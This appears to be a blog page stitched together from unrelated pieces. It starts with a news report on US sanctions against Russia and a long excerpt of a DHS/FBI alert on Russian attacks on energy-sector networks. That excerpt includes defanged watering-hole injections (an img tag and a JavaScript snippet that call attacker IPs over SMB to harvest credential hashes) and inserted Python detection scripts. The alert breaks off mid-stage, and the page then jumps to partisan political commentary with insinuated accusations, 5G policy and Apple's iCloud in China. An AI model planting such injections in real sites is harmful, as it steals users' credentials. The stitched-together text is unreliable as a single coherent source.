CERT/FBI Declaration of Russia Hacking U.S. Infrastructure

US sanctions Russia for election interference, cyberattacks

The US government takes action against Russia for misdeeds including what it’s calling the “most destructive cyberattack in history.”

CNet: The White House has announced an array of sanctions against Russia for meddling in US elections and for broader hacking efforts, including one incident it called “most destructive and costly cyberattack in history.”

The US government unveiled the sanctions Thursday morning, saying they were prompted by Russia’s online propaganda campaign during the US elections, massive hacks of Yahoo and attempted cyberattacks against electrical grids in the US.

The government singled out Russia’s role in the NotPetya attack, a piece of malware that was disguised as ransomware but actually designed to destroy data. Last month, the Trump Administration attributed the attack to Russia, saying it caused billions of dollars in damage in Europe, Asia and the Americas.


“These targeted sanctions are a part of a broader effort to address the ongoing nefarious attacks emanating from Russia,” Treasury Secretary Steven Mnuchin said in a statement. The sanctions, he said, will “hold Russian government officials and oligarchs accountable for their destabilizing activities by severing their access to the US financial system.”

The sanctions come after an investigation by the Department of Homeland Security and the FBI.

The sanctions fall on 19 individuals and five Russian entities, including the Internet Research Agency, a trolling farm designed to meddle in the 2016 presidential election through divisive posts on social media. They also target Russia’s intelligence agency, known as the Federal Security Service or FSB, and the country’s military intelligence organization, the GRU.

The Russian embassy didn’t respond to a request for comment.

‘A long-overdue step’

On Capitol Hill, the sanctions fed into a continuing controversy over Russian meddling in American democratic processes.

“This is a welcome, if long-overdue, step by the Trump administration to punish Russia for interfering with the 2016 election,” Sen. Mark Warner, a Democrat from Virginia, said in a statement.

Still, the vice chairman of the Senate intelligence committee criticized the sanctions because they “do not go far enough,” pointing out that many of the named entities were either already sanctioned under the Obama administration or have been charged by the Justice Department.

“With the midterm elections fast approaching,” he said, “the Administration needs to step it up, if we have any hope of deterring Russian meddling in 2018.”

Senior national security officials said the FSB was directly involved in hacking millions of Yahoo accounts, while the GRU was behind the interference in the 2016 presidential election and the NotPetya cyberattack.

The sanctions fall under the Countering America’s Adversaries Through Sanctions Act, which authorizes pushback against “aggression by the governments of Iran, the Russian Federation and North Korea.”

Investigators found evidence of Russian attempts to hack into the US electric grid through spear-phishing tactics, senior national security officials said. The attacks have been going on since March 2016, targeting multiple US government offices, as well as energy, water, nuclear and critical manufacturing companies.

The DHS and the FBI provided details in a technical alert released Thursday, calling the actions a “multistage intrusion” through which Russian hackers were able to gain remote access into energy sector networks.


Systems Affected

  • Domain Controllers
  • File Servers
  • Email Servers

Overview

This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This alert provides information on Russian government actions targeting U.S. Government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors. It also contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by Russian government cyber actors on compromised victim networks. DHS and FBI produced this alert to educate network defenders to enhance their ability to identify and reduce exposure to malicious activity.

DHS and FBI characterize this activity as a multi-stage intrusion campaign by Russian government cyber actors who targeted small commercial facilities’ networks where they staged malware, conducted spear phishing, and gained remote access into energy sector networks. After obtaining access, the Russian government cyber actors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).

For a downloadable copy of IOC packages and associated files, see:

Contact DHS or law enforcement immediately to report an intrusion and to request incident response resources or technical assistance.

Description

Since at least March 2016, Russian government cyber actors—hereafter referred to as “threat actors”—targeted government entities and multiple U.S. critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.

Analysis by DHS and FBI resulted in the identification of distinct indicators and behaviors related to this activity. Of note, the report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6, 2017, provides additional information about this ongoing campaign. [1]

This campaign comprises two distinct categories of victims: staging and intended targets. The initial victims are peripheral organizations such as trusted third-party suppliers with less secure networks, referred to as “staging targets” throughout this alert. The threat actors used the staging targets’ networks as pivot points and malware repositories when targeting their final intended victims. NCCIC and FBI judge the ultimate objective of the actors is to compromise organizational networks, also referred to as the “intended target.”

Technical Details

The threat actors in this campaign employed a variety of TTPs, including

  • spear-phishing emails (from compromised legitimate account),
  • watering-hole domains,
  • credential gathering,
  • open-source and network reconnaissance,
  • host-based exploitation, and
  • targeting industrial control system (ICS) infrastructure.

Using Cyber Kill Chain for Analysis

DHS used the Lockheed-Martin Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity. Phases of the model include reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on the objective. This section will provide a high-level overview of threat actors’ activities within this framework.

 

Stage 1: Reconnaissance

The threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity. Staging targets held preexisting relationships with many of the intended targets. DHS analysis identified the threat actors accessing publicly available information hosted by organization-monitored networks during the reconnaissance phase. Based on forensic analysis, DHS assesses the threat actors sought information on network and organizational design and control system capabilities within organizations. These tactics are commonly used to collect the information needed for targeted spear-phishing attempts. In some cases, information posted to company websites, especially information that may appear to be innocuous, may contain operationally sensitive information. As an example, the threat actors downloaded a small photo from a publicly accessible human resources page. The image, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background.

Analysis also revealed that the threat actors used compromised staging targets to download the source code for several intended targets’ websites. Additionally, the threat actors attempted to remotely access infrastructure such as corporate web-based email and virtual private network (VPN) connections.

 

Stage 2: Weaponization

Spear-Phishing Email TTPs

Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. (An example of this request is: file[:]//<remote IP address>/Normal.dotm). As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving the requested file. (Note: transfer of credentials can occur even if the file is not retrieved.) After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication. [2]
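As an added illustration (not part of the DHS/FBI alert), the following Python check inspects an Office Open XML attachment for external relationships that point at a file:// URI or UNC path, which is how a document can ask Word to fetch a remote file such as Normal.dotm over SMB. The sample package is constructed in memory, the address 192.0.2.10 is a documentation placeholder, and the function names are hypothetical.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_TAG = "{http://schemas.openxmlformats.org/package/2006/relationships}Relationship"
# file:// URIs and UNC paths make Office open an SMB session to the named host.
SMB_TARGET = re.compile(r"^\s*(file:/{2,}|\\\\)", re.IGNORECASE)
MAX_RELS_BYTES = 1_000_000  # relationship parts are tiny; anything larger is suspect


def external_smb_targets(package_bytes):
    """Return (part, relationship type, target) for every external relationship
    in an OOXML package whose target is a file:// URI or a UNC path."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.endswith(".rels"):
                continue
            if info.file_size > MAX_RELS_BYTES:
                findings.append((info.filename, "oversized-part", ""))
                continue
            data = zf.read(info)
            # Relationship parts never need a DTD; do not parse one from an attachment.
            if b"<!DOCTYPE" in data or b"<!ENTITY" in data:
                findings.append((info.filename, "dtd-present", ""))
                continue
            try:
                root = ET.fromstring(data)
            except ET.ParseError:
                findings.append((info.filename, "unparseable", ""))
                continue
            for rel in root.iter(REL_TAG):
                if rel.get("TargetMode", "").lower() != "external":
                    continue  # internal parts never leave the package
                target = rel.get("Target", "")
                if SMB_TARGET.match(target):
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    findings.append((info.filename, rel_type, target))
    return findings


def build_sample_package(template_target):
    """Constructed sample: only the parts this check reads, not a full document."""
    settings_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
        'officeDocument/2006/relationships/attachedTemplate" '
        f'Target="{template_target}" TargetMode="External"/>'
        "</Relationships>"
    )
    document_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
        'officeDocument/2006/relationships/styles" Target="styles.xml"/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
        zf.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_package("file://192.0.2.10/Normal.dotm")
    for part, rel_type, target in external_smb_targets(sample):
        print(f"{part}: {rel_type} -> {target}")
```

A mail gateway or triage script can run the same function on each inbound .docx and quarantine any attachment that returns a finding.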

 

Use of Watering Hole Domains

One of the threat actors’ primary uses for staging targets was to develop watering holes. Threat actors compromised the infrastructure of trusted organizations to reach intended targets. [3] Approximately half of the known watering holes are trade publications and informational websites related to process control, ICS, or critical infrastructure. Although these watering holes may host legitimate content developed by reputable organizations, the threat actors altered websites to contain and reference malicious content. The threat actors used legitimate credentials to access and directly modify the website content. The threat actors modified these websites by altering JavaScript and PHP files to request a file icon using SMB from an IP address controlled by the threat actors. This request accomplishes a similar technique observed in the spear-phishing documents for credential harvesting. In one instance, the threat actors added a line of code into the file “header.php”, a legitimate PHP file that carried out the redirected traffic.

<img src="file[:]//62.8.193[.]206/main_logo.png" style="height: 1px; width: 1px;" />

In another instance, the threat actors modified the JavaScript file, “modernizr.js”, a legitimate JavaScript library used by the website to detect various aspects of the user’s browser. The file was modified to contain the contents below:

var i = document.createElement("img");
i.src = "file[:]//184.154.150[.]66/ame_icon.png";
i.width = 3;
i.height=2;
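For site owners, the watering-hole modifications described above can be caught by comparing served files against a known-good baseline and flagging any file:// reference that names a remote host. The sketch below is an added example, not code from the alert. The file contents are constructed samples modelled on the header.php and modernizr.js cases, the 192.0.2.x addresses are documentation placeholders, and all function names are hypothetical.

```python
import hashlib
import re

# file://HOST/... (or file:////HOST/...) names a remote host, which a Windows
# client reaches over SMB; file:///path has an empty host and stays local.
REMOTE_FILE_URI = re.compile(
    r"""file:/{2}(?:/{2})?(?P<host>[^/\s"'<>]+)/(?P<path>[^\s"'<>)]*)""",
    re.IGNORECASE,
)
LOCAL_HOSTS = {"localhost", "127.0.0.1"}


def sha256_text(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def remote_file_refs(text):
    """Return (line number, host, path) for each remote file:// reference."""
    refs = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in REMOTE_FILE_URI.finditer(line):
            host = match.group("host").lower()
            if host not in LOCAL_HOSTS:
                refs.append((lineno, host, match.group("path")))
    return refs


def audit_web_root(current, baseline):
    """current maps relative path -> file text; baseline maps path -> SHA-256.
    Reports files that are modified, unexpected, missing, or that carry a
    remote file:// reference even when their hash is in the baseline."""
    report = []
    for path in sorted(set(current) | set(baseline)):
        if path not in current:
            report.append({"path": path, "status": "missing", "smb_refs": []})
            continue
        text = current[path]
        if path not in baseline:
            status = "unexpected"
        elif baseline[path] != sha256_text(text):
            status = "modified"
        else:
            status = "unchanged"
        refs = remote_file_refs(text)
        if status != "unchanged" or refs:
            report.append({"path": path, "status": status, "smb_refs": refs})
    return report


# Constructed samples: a clean site and the same site after tampering.
CLEAN_HEADER = (
    '<?php include "config.php"; ?>\n'
    "<header>\n"
    '<img src="/img/logo.png" />\n'
    "</header>\n"
)
CLEAN_JS = "window.Modernizr = (function () { return {}; })();\n"
CLEAN_SITE = {"header.php": CLEAN_HEADER, "js/modernizr.js": CLEAN_JS}
BASELINE = {path: sha256_text(text) for path, text in CLEAN_SITE.items()}

TAMPERED_SITE = {
    "header.php": CLEAN_HEADER
    + '<img src="file://192.0.2.20/main_logo.png" style="height: 1px; width: 1px;" />\n',
    "js/modernizr.js": CLEAN_JS
    + 'var i = document.createElement("img");\n'
    + 'i.src = "file://192.0.2.21/ame_icon.png";\n'
    + "i.width = 3;\n"
    + "i.height = 2;\n",
}

if __name__ == "__main__":
    for entry in audit_web_root(TAMPERED_SITE, BASELINE):
        print(entry)
```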

Stage 3: Delivery

When compromising staging target networks, the threat actors used spear-phishing emails that differed from previously reported TTPs. The spear-phishing emails used a generic contract agreement theme (with the subject line “AGREEMENT & Confidential”) and contained a generic PDF document titled ``document.pdf. (Note the inclusion of two single back ticks at the beginning of the attachment name.) The PDF was not malicious and did not contain any active code. The document contained a shortened URL that, when clicked, led users to a website that prompted the user for email address and password. (Note: no code within the PDF initiated a download.)

In previous reporting, DHS and FBI noted that all of these spear-phishing emails referred to control systems or process control systems. The threat actors continued using these themes specifically against intended target organizations. Email messages included references to common industrial control equipment and protocols. The emails used malicious Microsoft Word attachments that appeared to be legitimate résumés or curricula vitae (CVs) for industrial control systems personnel, and invitations and policy documents to entice the user to open the attachment.

 

Stage 4: Exploitation

The threat actors used distinct and unusual TTPs in the phishing campaign directed at staging targets. Emails contained successive redirects to http://bit[.]ly/2m0x8IH link, which redirected to http://tinyurl[.]com/h3sdqck link, which redirected to the ultimate destination of http://imageliners[.]com/nitel. The imageliner[.]com website contained input fields for an email address and password mimicking a login page for a website.

When exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents retrieved a file through a “file://” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. This connection is made to a command and control (C2) server—either a server owned by the threat actors or that of a victim. When a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users received a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information over TCP ports 445 or 139. (Note: a file transfer is not necessary for a loss of credential information.) Symantec’s report associates this behavior with the Dragonfly threat actors in this campaign. [1]
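Because the credential hash is sent as soon as the SMB session is negotiated, any flow from an internal host to an outside address on TCP 445 or 139 deserves attention, even one that carried almost no data. The following detection pass over flow records is an added example rather than part of the alert. The CSV layout, the internal address ranges and every log line are constructed assumptions, and the function names are hypothetical.

```python
import csv
import io
import ipaddress

SMB_PORTS = {139, 445}
# Assumption: the organization's internal ranges. Listed explicitly because
# ipaddress.is_private also covers documentation and other reserved ranges.
INTERNAL_NETS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")
]


def is_internal(addr):
    ip = ipaddress.ip_address(addr)  # raises ValueError on malformed input
    return any(ip in net for net in INTERNAL_NETS)


def outbound_smb(flow_csv):
    """Group internal -> external TCP 139/445 flows by (src, dst).
    Byte counts are ignored on purpose: a zero-byte flow still counts."""
    hits = {}
    for row in csv.DictReader(io.StringIO(flow_csv)):
        try:
            dport = int(row["dport"])
            src_internal = is_internal(row["src"])
            dst_internal = is_internal(row["dst"])
        except (KeyError, TypeError, ValueError):
            continue  # skip malformed records rather than abort the run
        if (row.get("proto") or "").lower() != "tcp" or dport not in SMB_PORTS:
            continue
        if not src_internal or dst_internal:
            continue  # only internal hosts talking to outside addresses
        hit = hits.setdefault(
            (row["src"], row["dst"]),
            {"src": row["src"], "dst": row["dst"], "ports": set(),
             "flows": 0, "first_seen": row["ts"]},
        )
        hit["ports"].add(dport)
        hit["flows"] += 1
        hit["first_seen"] = min(hit["first_seen"], row["ts"])
    return [dict(h, ports=sorted(h["ports"])) for _, h in sorted(hits.items())]


# Constructed flow records (not taken from the alert).
SAMPLE_FLOWS = """\
ts,src,dst,dport,proto,bytes
2018-03-15T09:12:01Z,10.20.1.15,192.0.2.10,445,tcp,1840
2018-03-15T09:12:03Z,10.20.1.15,10.20.0.5,445,tcp,88213
2018-03-15T09:14:40Z,10.20.3.7,198.51.100.23,139,tcp,912
2018-03-15T09:15:02Z,10.20.1.15,192.0.2.10,445,tcp,0
2018-03-15T09:15:30Z,10.20.2.9,203.0.113.80,443,tcp,5120
2018-03-15T09:16:00Z,10.20.4.4,not-an-ip,445,tcp,10
"""

if __name__ == "__main__":
    for hit in outbound_smb(SAMPLE_FLOWS):
        print(hit)
```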

 

Stage 5: Installation

The threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication was not used. [4] To maintain persistence, the threat actors created local administrator accounts within staging targets and placed malicious files within intended targets.

 

Establishing Local Accounts

The threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts. The initial script “symantec_help.jsp” contained a one-line reference to a malicious script designed to create the local administrator account and manipulate the firewall for remote access. The script was located in “C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\tomcat\webapps\ROOT\”.

 

Pritzker, Boxer, Sherman and MoveOn.org, the Strike Force

The top person on John Kerry’s Iran JPOA team was Wendy Sherman. But then we have Obama’s dear friend Penny Pritzker in the mix too, along with Barbara Boxer and Hillary’s Jake Sherman all part of this National Security Action team, which is all things against Trump. So, while we do have the Director of MoveOn in the mix…this group likely has some robust funding from Soros.

This is a strike force that even includes Jeremy Bash.

He served as Chief of Staff of the CIA (2009-2011) and Defense Department (2011-2013), was Panetta’s right hand person and perhaps we should remember it was Panetta that allowed Hollywood access to top secret information to make a movie, that Zero Dark Thirty movie.

According to a June 15, 2011, email from Benjamin Rhodes, Deputy National Security Advisor for Strategic Communications, the Obama White House was intent on “trying to have visibility into the UBL (Usama bin Laden) projects and this is likely a high profile one.”


Ben Rhodes, the aspiring novelist, became Obama’s top advisor even when Rhodes’ security clearance was denied.

In early July 2012, Obama’s senior White House adviser on Iran, Puneet Talwar, and Secretary of State Hillary Clinton’s right-hand man, Jake Sullivan, arrived in the sleepy Arabian sultanate of Oman, 150 miles across sparkling Gulf waters from the Iranian coast. It was the first significant back-channel contact with Tehran.

FNC: A group of about 50 former Obama administration officials recently formed a think tank called National Security Action to attack the Trump administration’s national security policies.

The mission statement of the group is anything but subtle: “National Security Action is dedicated to advancing American global leadership and opposing the reckless policies of the Trump administration that endanger our national security and undermine U.S. strength in the world.”

National Security Action plans to pursue typical liberal foreign policy themes such as climate change, challenging President Trump’s leadership, immigration and allegations of corruption between the president and foreign powers.

This organization uses the acronym NSA, which is ironic. Three of its founding members – Ben Rhodes, Susan Rice and Samantha Power – likely were involved in abusing intelligence from the federal NSA (National Security Agency) to unmask the names of Trump campaign staff from intelligence reports and to leak NSA intercepts to the media to hurt Donald Trump politically. This included a leak to the media of an NSA transcript in February 2017 of former National Security Adviser Michael Flynn’s discussion with Russian Ambassador to the U.S. Sergei Kislyak. No one has been prosecuted for this leak.

Given the likely involvement of Rhodes, Rice and Power to weaponize intelligence against the Trump presidential campaign, will their anti-Trump NSA issue an apology for these abuses?

It is interesting that the new anti-Trump group says nothing in its mandate about protecting the privacy of Americans from illegal surveillance, preventing the politicization of U.S. intelligence agencies or promoting aggressive intelligence oversight. Maybe this is because the founders plan to abuse U.S. intelligence agencies to spy on Republican lawmakers and candidates if they join a future Democratic administration.

It takes a lot of chutzpah for this group of former Obama officials, who were part of the worst U.S. foreign policy in history, to condemn the current president’s successful international leadership and foreign policy.

After all, ISIS was born on President Obama’s watch because of his mismanagement of the U.S. withdrawal from Iraq and his “leading from behind” Middle East policy. The Syrian civil war spun out of control because of the incompetence of President Obama and his national security team.

This was a team that provided false information to the American people about the 2012 terrorist attack on the U.S. consulate in Benghazi and the nuclear deal with Iran. I wonder if the anti-Trump NSA will include videos on its website of former National Security Adviser Susan Rice falsely claiming on five Sunday morning news shows in September 2012 that the attack on the Benghazi consulate was “spontaneous” and in response to an anti-Muslim video.

And of course there’s the North Korean nuclear and missile programs that surged during the Obama years due to the administration’s “Strategic Patience” policy, an approach designed to kick this problem down the road to the next president. Because of President Obama’s incompetence, North Korean dictator Kim Jong Un may have an H-bomb that he soon will be able to load onto an intercontinental ballistic missile to attack the United States.

It must appall this group of former Obama national security officials that President Trump is succeeding as he undoes everything they worked on.

ISIS will soon control no territory in Iraq or Syria because of the Trump administration’s intensified attacks on it and arming of Kurdish militias.

In sharp contrast to President Obama, President Trump drew a chemical weapons red line in Syria and enforced it.

North Korea is pushing for talks with the U.S. in response to strong United Nations sanctions the U.S. worked to obtain in 2017. And compliance with the new sanctions has been significantly improved, especially by China, as the result of President Trump’s actions.

President Trump repaired the damage done to U.S.-Israel relations by President Obama and has recognized Jerusalem as the capital of Israel – something several previous presidents promised but failed to do.

Iranian harassment of U.S. ships in the Persian Gulf stopped in 2017, likely due to the more assertive Iran policy of President Trump. This includes the president’s successful effort to build a stronger U.S. relationship with Saudi Arabia.

President Trump is right when he says he inherited a mess on national security from the Obama administration. This is because President Obama and his national security team undermined U.S. credibility and left President Trump a much more dangerous world. I doubt the new anti-Trump National Security Action think tank will succeed in convincing Americans otherwise.

The war on 5G Nationally and Internationally

The first, 1G, was invented by Motorola in 1973. The 1G networks provided basic phone service with analog protocols and speeds of 2.4 kilobits per second. Compare that to today’s 4G network speed of 100 megabits per second and 5G’s proposed 100 gigabits per second. Also in 1973, IEEE Member Robert M. Metcalf invented Ethernet, one of the key enablers of wireless and local Internet access. Ethernet is part of the IEEE 802 suite of standards that underpins wireless networking applications and includes access to the Internet. The 802.11 standard is better known by its trademark name: Wi-Fi. More here.

***

When fourth generation (4G) services launched early this decade, the U.S. led the way. The Federal Communications Commission (FCC) unlocked valuable spectrum, and carriers responded by accommodating a radical, 20-fold growth in global mobile data traffic. The massive investment in wireless network infrastructure rewarded American consumers with faster wireless speeds at affordable prices. In addition to speeding up smartphones in our pockets, the U.S. economy saw an estimated increase in GDP between $73–$151 billion and up to 700,000 new jobs as a result and America was established as the test bed for innovation in the global digital economy.

Now our country faces a similar opportunity and challenge with fifth generation (5G) mobile networks, and it warrants the attention of consumers, the mobile industry, and policymakers. The economic stakes for 5G may be significantly higher than for 4G, led by large-scale job creation and incubation of new devices, applications, and business models that could dramatically stimulate the U.S. economy. More here.

***

As of 2017, development of 5G is being led by several companies, including Samsung, Intel, Qualcomm, Nokia, Huawei, Ericsson, ZTE and others. Huawei and ZTE are part of the Chinese government and all our intelligence agencies have declared they are NOT safe to use in the government realm or the private sector. Canadian media is warning the same due to cyber vulnerabilities. This is all about the expanding digital economy where various cyber currencies will prevail over tangible currency and those respective values cannot be controlled or managed.

***

President Donald Trump signed an executive order in January calling on federal agencies “to use all viable tools” to build broadband in rural areas on federal lands.

“Those towers are going to go up, and you’re going to have great, great broadband,” Trump said.

But telecom companies don’t have plans to expand 5G to rural areas. Where are they going? To urban and suburban neighborhoods where the business-friendly FCC is considering rules that would limit local governments from having as much of a say over where they go, how they look and how much they can charge for use of public property. Published in partnership with the New York Times 

Small cells are the next generation of wireless technology, which telecommunications firms and cell-tower builders want to place on streetlights and utility poles throughout neighborhoods nationwide. The small cells come with a host of equipment, including antennas, power supplies, electric meters, switches, cabling and boxes often strapped to the sides of poles. Some may have refrigerator-sized containers on the ground. And they will be placed about every 500 or so feet along residential streets and throughout business districts.

Telecom companies say the cells will be both unobtrusive and safe, and insist the technology is needed to bring faster internet speeds required by a more connected world.

Telecommunications companies say the current 4G network is becoming overloaded as more people stream more videos and use more data-heavy apps. The advent of driverless cars, smart homes, telemedicine and virtual-reality will create more demand on wireless networks, requiring more bandwidth and faster speeds.

What’s needed, the wireless industry says, is 5G. The next generation network, still in development, is a combination of advanced hardware and standards such as distributed antenna systems, more fiber-optic cable, new data management practices and higher frequencies that will enable the network to carry more data up to 100 times faster than 4G.

5G will depend on so-called millimeter waves. These high-frequency bands, however, don’t travel as far as the signals 4G relies on and are easily blocked by walls, trees and even rain. So the network needs to be dense, with cells placed much closer together. That means way more wireless facilities. More than 300,000 cells are now in operation nationwide, and estimates for the number of small cells needed to make 5G work range from hundreds of thousands to millions more.

The rollout of 5G will be evolutionary, with the standards for the full complement of advanced technologies expected after 2020. Small cells already are being erected with 5G tests in many cities, and as that’s happened, citizens have descended on government meetings to express their anger — from  Woodbury, New York; to Liberty Township, Ohio; to Charlotte; to Pasco County, Florida; to Olympia, Washington.

5G promises to generate huge profits for the wireless companies, with as much as $250 billion in service revenue expected annually by 2025. And 5G will unleash an economic boom, say supporters of pre-empting local rules. They frequently cite a report by the consulting firm Accenture, which concluded that wireless firms will invest $275 billion over the next seven years deploying small cells, creating 3 million jobs and eventually boosting the national economy by $500 billion annually.

The study appears everywhere — mentioned by FCC commissioners in speeches, cited in an official FCC docket, in wireless carriers’ comments, and in statements by the powerful Washington associations that represent them. What most don’t mention is that the study was paid for by the wireless association CTIA, one of Washington’s top lobbying spenders.

The wireless industry argues that localities’ high fees, design requirements and delays in processing permits have effectively prohibited the deployment of broadband, which they argue is a violation of federal law; they’ve asked the FCC to make that clear in reining in cities and counties.

Wireless carriers and the companies that build towers for them have begun flooding city and county permitting offices with applications for attaching small cells to poles and building new ones. Cities such as Houston that normally see a few dozen such applications yearly began in 2016 to get hundreds. Montgomery County said it had at one point more applications filed in four months than in the previous 18 years.

Wireless companies complain local governments can’t process the permits fast enough because their systems are set up to review applications for massive cell towers, not the small cells they claim are less intrusive. The process needs to move quickly, they say, because 5G requires so many more cells, and they want to beat other countries to set standards.

The FCC issued a notice in April that it would consider rules to streamline cell deployment by reducing the time cities and counties have to review applications. The agency also said it would study, with the possibility of proposing rules later, both how the FCC could limit cities’ requirements on the look and design of small cells, and if local fees to attach to poles are excessive. The FCC also asked for ways it could amend its own rules. The agency may consider the proposals by the summer.

Pai, a former attorney for Verizon, also created last year a committee of representatives mostly from the wireless industry to develop model codes that cities and counties can adopt to speed the permitting of small cells and to reduce costs to telecoms. The committee is considering proposals, which it plans to formally submit to the FCC later this spring, that run the gamut, from simply calling on cities and the wireless industry to work together to controversial recommendations such as capping what cities charge to attach to public property.

Mayor Sam Liccardo of San Jose, California, one of the few members on the committee representing local interests and who has been critical of wireless companies’ efforts to weaken local rules, resigned from the group in January, saying the wireless industry “has sought to create a set of rules that will provide it with easy access to publicly-funded infrastructure at taxpayer-subsidized rates, without any obligation to provide broadband access to underserved residents.”

In response, Pai said in a statement that the committee has “brought together 101 participants from a range of perspectives” and he looks forward to working with the committee and others “to remove regulatory barriers to broadband deployment and to extend digital opportunity to all Americans.”

Bipartisan agreement

Congress is also weighing in — in rare bipartisan fashion — on the side of the telecom firms. Numerous bills in both the Senate and House would ease regulations and fees for erecting cells on federal lands, such as a bill the Senate passed last summer that would exempt certain small-cell deployments from environmental and historic reviews. The bill, which the House has yet to consider, is sponsored by South Dakota Sen. John Thune, the Republican chairman of the Commerce, Science and Transportation committee, and Sen. Bill Nelson, D-Fla., the ranking member of the committee.

Also last year, Thune joined Democratic Sen. Brian Schatz from Hawaii to circulate a draft bill that rolls back local government control over wireless facilities including small cells, including shortening the permit review times to 60 days on applications to collocate wireless facilities and 90 days for other wireless applications — the same time frames wireless providers are asking the FCC to consider.

Sens. Roger Wicker, R-Miss., and Catherine Cortez Masto, D-Nev., introduced a bill that would exempt small cells being deployed in a public right of way from environmental and historical reviews under certain circumstances. A companion bill is in the House. Numerous other bills are moving through the House.

Wicker and Thune are among the top 25 senators who have received the most campaign contributions from AT&T and Verizon since 2010, pulling in $32,500 and $30,500, respectively, according to the Center for Responsive Politics. Schatz has received $29,000 from the two carriers, the third most among senators since 2014, when he ran his first campaign.

With such bipartisan support in Congress, and with an FCC that is sympathetic to telecoms, cities view their control over small cells as slipping away. That leaves people like King resigned to what is coming.

“A Russian woman stood up to speak at one of these public meetings, and she said that when she lived in Russia, the government slam dunked her and she had no say,” King said. “Now she lives in the United States of America, where she’s getting slam dunked by the government and she has no say. That gives you a window into what’s going on here.”

 

Apple, China and iCloud Data Safety?

Primer: Pegatron, the factory at the corner of Xiu Yan and Shen Jiang roads is one of the most secretive facilities at the heart of iPhone production and covers an area equal to almost 90 football fields. In the center is a plaza with a firehouse, police station and post office. There are shuttle buses, mega-cafeterias, landscaped lawns and koi ponds. The grey and brown-hued concrete buildings are meant to evoke traditional Chinese architecture. The brand-new Shanghai Disneyland, which opens its doors in June, is a 20-minute drive away.

Inside, the factory still hides a secret, according to China Labor Watch. Base pay remains so low that workers need overtime simply to make ends meet, the advocacy group said. It said 1,261 pay stubs from Pegatron’s Shanghai facility from September and October 2015 show evidence of excessive overtime. Pegatron, an Asustek spinoff, is the world’s biggest contract electronics manufacturer after Foxconn, according to Bloomberg Intelligence. More here.

This Wednesday, Apple will be making some significant changes to how data is stored for users of its iCloud service in China – raising major concerns that the Chinese authorities will now be able to freely monitor Apple’s users in China. This may be quite worrying for the population and may remind you of the iCloud breach on 31 August 2014. Ever since then, people have been very sceptical of storing precious information online and have been purchasing services from businesses like http://www.thefinalstep.co.uk/ to protect their data from any hackers.

Apple has a reputation for being a powerful advocate for privacy and security. The company uses strong encryption by default in its services and grabbed headlines when it appealed a US court order that would allow the FBI to get around the phone’s security. Apple CEO Tim Cook even sent all Apple consumers a personal letter explaining the importance of privacy.

With China, however, a different story has emerged. Apple has been criticised for blocking Chinese users’ access to the Apple News app and for removing VPN apps from the App Store in China. The changes being made to iCloud are the latest indication that China’s repressive legal environment is making it difficult for Apple to uphold its commitments to user privacy and security. What do these changes mean and what options do Apple’s customers have to protect themselves?

  1. What is happening to Apple’s iCloud service in China?

On 28 February, Apple will transfer operation of its iCloud service for Chinese users to a Chinese company, Guizhou-Cloud Big Data Industry Development Co., Ltd (“GCBD”). The concept of iCloud and other Cloud computing services can be quite confusing to some, especially if it is something completely new to you. It is very interesting to look into. As many of us use services like this to store our files and photos, it makes sense to know what this is all about. Why not look into a site like https://www.salesforce.com/what-is-cloud-computing/ to stay informed.

The move will affect any photos, documents, contacts, messages and other user data and content that Chinese users store on Apple’s cloud-based servers. New Chinese legislation enacted in 2017 requires cloud services to be operated by Chinese companies, meaning companies like Apple must either lease server space inside China or establish joint ventures with Chinese partners.

  2. How does storing user data in China put individuals at risk?

Domestic law gives the Chinese government virtually unfettered access to user data stored inside China without adequate protection for users’ rights to privacy, freedom of expression or other basic human rights. Chinese police enjoy sweeping discretion and use broad and ambiguously constructed laws and regulations to silence dissent, restrict or censor information and harass and prosecute human rights defenders and others in the name of “national security” and other purported criminal offences. As a result, Chinese Internet users can face arrest and imprisonment for merely expressing, communicating or accessing information and ideas that the authorities don’t like.

